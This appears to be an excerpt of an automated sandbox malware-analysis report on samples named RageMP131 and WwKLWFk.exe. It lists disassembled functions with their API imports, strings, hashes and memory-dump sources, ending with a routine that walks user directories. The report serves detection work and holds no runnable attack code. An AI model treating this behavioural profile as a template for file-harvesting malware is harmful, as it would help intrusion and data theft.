String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
Instruction ID: 8e7dc35871e5cd49398ed5b4bcbe384538ad416425dfcdef370e543c350bf461
Opcode Fuzzy Hash: f20598b848e850d1ec2220124021d7a1ce4b5a33389b79949531ac760cd57e4e
Instruction Fuzzy Hash: 2341C430A04208ABCF16DF69C880E9E7BB4AF45325F148455FC18AB362E732DA59CF90

Function 002D9240 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 002D9263
std::_Lockit::_Lockit.LIBCPMT ref: 002D9286
std::_Lockit::~_Lockit.LIBCPMT ref: 002D92A6
std::_Facet_Register.LIBCPMT ref: 002D931B
std::_Lockit::~_Lockit.LIBCPMT ref: 002D9333
Concurrency::cancel_current_task.LIBCPMT ref: 002D934B

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 038eb88e9bc25fbc1d5bdd33249a715d382ec711aa3f9f39f2a41899c2de220e
Instruction ID: 11146d8bd908ba573ada78268ac825660b1f38d7ed96bce9c95b33023ee7288a
Opcode Fuzzy Hash: 038eb88e9bc25fbc1d5bdd33249a715d382ec711aa3f9f39f2a41899c2de220e
Instruction Fuzzy Hash: 5941CF71910215AFCF16DF58D885BAEBBB8FF42310F14425AE8046B391D730AD95CBD1

Function 00275DD0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 424COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002760F2
___std_exception_destroy.LIBVCRUNTIME ref: 0027617F
___std_exception_copy.LIBVCRUNTIME ref: 00276248

Strings

recursive_directory_iterator::operator++, xrefs: 002761CC

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy$___std_exception_copy
String ID: recursive_directory_iterator::operator++
API String ID: 1206660477-953255998
Opcode ID: d0df4faeb183193c5760e48c18384fa8a467427eee8f6a9f35b5c5ae4780f301
Instruction ID: 0594a0cc6d550537fc2993e345aaf3bf4f77f323e2df88938902f8f787ed5c99
Opcode Fuzzy Hash: d0df4faeb183193c5760e48c18384fa8a467427eee8f6a9f35b5c5ae4780f301
Instruction Fuzzy Hash: 9BE145B19106049FCB29DF68C845BAEF7F9FF45300F10861DE41A97B81E7B4AA54CBA1

Function 002784C0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 196COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002786DE
___std_exception_destroy.LIBVCRUNTIME ref: 002786ED

Strings

, column , xrefs: 00278555, 0027856B
at line , xrefs: 00278518

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: at line $, column
API String ID: 4194217158-191570568
Opcode ID: 125baf7728b78b62a0fa8121292faf5e25d70e58cd6f9b2eb78f086d0f8516a6
Instruction ID: 195fe1d863000ff6bd8b5965a9c09037fea22a570f74ba845e180f6ccf4b6ea8
Opcode Fuzzy Hash: 125baf7728b78b62a0fa8121292faf5e25d70e58cd6f9b2eb78f086d0f8516a6
Instruction Fuzzy Hash: 9C614C71E102049FDB09DF68CC8979EBBB9FF45310F14821CE419AB781EB74AA90CB91

Function 002E3150 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002E4109
___std_exception_destroy.LIBVCRUNTIME ref: 002E4122

Strings

value, xrefs: 002E402F

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 6bf397057438b9e714ff422a7ac90402f6495ef7a9735df653876eb5fbb4c03b
Instruction ID: d238d4fd97478cca79163f5b8fa857034f87b2e33773b9f20a07177407746e52
Opcode Fuzzy Hash: 6bf397057438b9e714ff422a7ac90402f6495ef7a9735df653876eb5fbb4c03b
Instruction Fuzzy Hash: C051B3B0C10288DBDF15DFA4CC89BDDBBB4AF05304F148259E448AB382D7756A98CB61

Function 00273B70 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00273C0F

Strings

ios_base::failbit set, xrefs: 00273AC8, 00273BB1
ios_base::eofbit set, xrefs: 00273BB6
ios_base::badbit set, xrefs: 00273BA7, 00273BD2, 00273BF3

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2659868963-1866435925
Opcode ID: 1ba982feae1316480fa85807d5f32f07fcb56bb261b5d4406637b8933199f747
Instruction ID: ff417a7a5d958731aab06304b771b13323bc143b358cf95a1f68f3d2ae7e86c6
Opcode Fuzzy Hash: 1ba982feae1316480fa85807d5f32f07fcb56bb261b5d4406637b8933199f747
Instruction Fuzzy Hash: CC11D2B6920709AFC715DF58D801B9AB3D8EF06320F14C52AF95C9B281F774EA24CB91

Function 002E26F0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

unordered_map/set too long, xrefs: 002E2BD3

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID:
String ID: unordered_map/set too long
API String ID: 0-306623848
Opcode ID: 01a967d14be0733641e64cbc69bb50ff7b17bbbc526a5ab0eeb7ca28139cd986
Instruction ID: b63141e3bdff4508e106116ce9f99502dfbd3eece4a605317f297c32934a5f1a
Opcode Fuzzy Hash: 01a967d14be0733641e64cbc69bb50ff7b17bbbc526a5ab0eeb7ca28139cd986
Instruction Fuzzy Hash: 67E1F671A10146DFCB18DF69C891A6DB7E9FF48310F648369E81A9B382D730ED65CB90

Function 00278080 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 318COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 0027844D

Strings

parse error, xrefs: 00278149, 00278162
ror, xrefs: 002780D4

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: parse error$ror
API String ID: 2659868963-4201802366
Opcode ID: 87698d26d3adb36f77554f4607e662a13d11798f6052d2bfdc83d73e97533c59
Instruction ID: 3d1654d047f19d5d8062bb9a9cafca8705c360263f37c69e2b8a27e82b746403
Opcode Fuzzy Hash: 87698d26d3adb36f77554f4607e662a13d11798f6052d2bfdc83d73e97533c59
Instruction Fuzzy Hash: 69C11731D206498FEB09CF68CC8979DBB75FF45304F14C248E4086B792DBB4AA94CB91

Function 00277DB0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 00278051
___std_exception_destroy.LIBVCRUNTIME ref: 00278060

Strings

[json.exception., xrefs: 00277E1C

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: [json.exception.
API String ID: 4194217158-791563284
Opcode ID: 419064be4f55501ded65e828b5a55aee135d6d07bb460ae4704b461920b6ed6f
Instruction ID: 97923d660fc6d235490ee3944938389f686b57ff029218d748a27d681caff89b
Opcode Fuzzy Hash: 419064be4f55501ded65e828b5a55aee135d6d07bb460ae4704b461920b6ed6f
Instruction Fuzzy Hash: 0A9127309102089FDB19CFA8CC85BAEFBB5FF45314F14825DE404AB792D7B0A994CB91

Function 00273A90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 150COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00273C0F

Strings

ios_base::failbit set, xrefs: 00273AC8
ios_base::badbit set, xrefs: 00273BA7, 00273BD2, 00273BF3

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID: ios_base::badbit set$ios_base::failbit set
API String ID: 2659868963-1240500531
Opcode ID: 258f7d2adcba02043f55f913fe27a3926144f96d5d609a4ade1d1b975ee23ea9
Instruction ID: 892e0ec4ccb3d8cfc838f70550755b752cf57a060b3c15531016a89cf1552865
Opcode Fuzzy Hash: 258f7d2adcba02043f55f913fe27a3926144f96d5d609a4ade1d1b975ee23ea9
Instruction Fuzzy Hash: 9441F6B5920209AFC715DF58CC41BAEF7F8EF45320F14C219F9189B681E774AA54CBA1

Function 002E4250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

___std_exception_destroy.LIBVCRUNTIME ref: 002E4AB9
___std_exception_destroy.LIBVCRUNTIME ref: 002E4AD2
___std_exception_destroy.LIBVCRUNTIME ref: 002E55DD
___std_exception_destroy.LIBVCRUNTIME ref: 002E55F6

Strings

value, xrefs: 002E5503

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: ___std_exception_destroy
String ID: value
API String ID: 4194217158-494360628
Opcode ID: 3f7b988a507dc18cdc505d3fb818f37e187c89a13a2c3bb078a803906b2db2e4
Instruction ID: 1e05613be504f1061421b5781bcfbf5b7803410dc3355016b0ff615804f34b3a
Opcode Fuzzy Hash: 3f7b988a507dc18cdc505d3fb818f37e187c89a13a2c3bb078a803906b2db2e4
Instruction Fuzzy Hash: CF51B2B0C20698DFDF15DFA4CC89BDEBBB8AF05304F544259E404AB381D774AA888B91

Function 002E9630 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 002E9681

Strings

type must be string, but is , xrefs: 002E96E8
type must be boolean, but is , xrefs: 002E9772

Memory Dump Source

Source File: 00000015.00000002.3729090981.0000000000271000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00270000, based on PE: true

Associated: 00000015.00000002.3728603761.0000000000270000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729090981.00000000003A3000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3729874616.00000000003A7000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.00000000003BA000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000053D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000061B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000658000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.0000000000661000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3730030285.000000000066F000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3733464868.0000000000670000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734204633.000000000081D000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734341467.000000000081E000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734440483.0000000000821000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.3734570883.0000000000822000.00000080.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_270000_RageMP131.jbxd

Yara matches

Similarity

API ID: Concurrency::cancel_current_task
String ID: type must be boolean, but is $type must be string, but is
API String ID: 118556049-436076039
Opcode ID: 4f89f316a25000d6372271e77e068d0bca0b1382f60b9e0981ef413721311ae6
Instruction ID: 6e53548c4497f92848ff39837fec5fcd97e55df26ad895c35140fe175e025ec2
Opcode Fuzzy Hash: 4f89f316a25000d6372271e77e068d0bca0b1382f60b9e0981ef413721311ae6
Instruction Fuzzy Hash: 08316E75D10284AFDB15EFA4D842B9EB7BCDB00310F50416AF819DB792EB34AD64CB52

Analysis Process: WwKLWFk.exePID: 1836, Parent PID: 5640COMMON

Execution Graph

Execution Coverage:	23.5%
Dynamic/Decrypted Code Coverage:	10.3%
Signature Coverage:	0%
Total number of Nodes:	300
Total number of Limit Nodes:	13

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00B529E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00B52A02
wsprintfA.USER32 ref: 00B52A1A
memset.MSVCRT ref: 00B52A44
lstrlen.KERNEL32(?), ref: 00B52A54
lstrcpyn.KERNEL32(?,?,-00000001), ref: 00B52A6C
strrchr.MSVCRT ref: 00B52A7C
lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00B52A9F
lstrlen.KERNEL32(Documents and Settings), ref: 00B52AAE
memset.MSVCRT ref: 00B52AC6
memset.MSVCRT ref: 00B52ADA
FindFirstFileA.KERNELBASE(?,?), ref: 00B52AEF
memset.MSVCRT ref: 00B52B13
lstrcmpiA.KERNEL32(?,?), ref: 00B52B42
FindNextFileA.KERNELBASE(00000000,?,?,00B52597,?), ref: 00B52B67
FindClose.KERNELBASE(00000000), ref: 00B52B6E

Strings

C:\, xrefs: 00B52A2F
%s*, xrefs: 00B52A14
Documents and Settings, xrefs: 00B52A8D, 00B52A92, 00B52A9A, 00B52AAD

Memory Dump Source

Source File: 00000016.00000002.1648135376.0000000000B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B50000, based on PE: true

